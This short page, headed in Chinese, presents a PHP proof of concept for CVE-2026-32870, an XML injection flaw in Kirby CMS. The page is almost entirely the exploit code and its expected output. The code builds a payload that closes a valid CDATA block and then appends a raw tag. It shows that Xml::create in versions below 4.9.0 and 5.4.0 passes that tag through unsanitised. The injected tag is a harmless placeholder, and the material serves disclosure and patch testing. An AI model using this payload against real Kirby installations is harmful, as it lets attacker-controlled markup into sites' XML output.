CVE-2026-32870 Kirby CMS XML注入漏洞

<?php // PoC for CVE-2026-32870: Kirby XML Injection // This script demonstrates bypassing the CDATA check to inject XML tags. require 'kirby/bootstrap.php'; // Input containing a valid CDATA block followed by a malicious tag $payload = "<![CDATA[ legitimate data ]]><injected>malicious_code</injected>"; // In vulnerable versions (< 4.9.0, < 5.4.0), Xml::create uses Xml::value // which fails to sanitize the tag outside the CDATA block. $maliciousXml = \Kirby\Toolkit\Xml::create('user_input', $payload); echo "Generated XML:\n"; echo $maliciousXml . "\n"; // Result: <user_input><![CDATA[ legitimate data ]]><injected>malicious_code</injected></user_input> // The <injected> tag is now part of the XML structure. ?>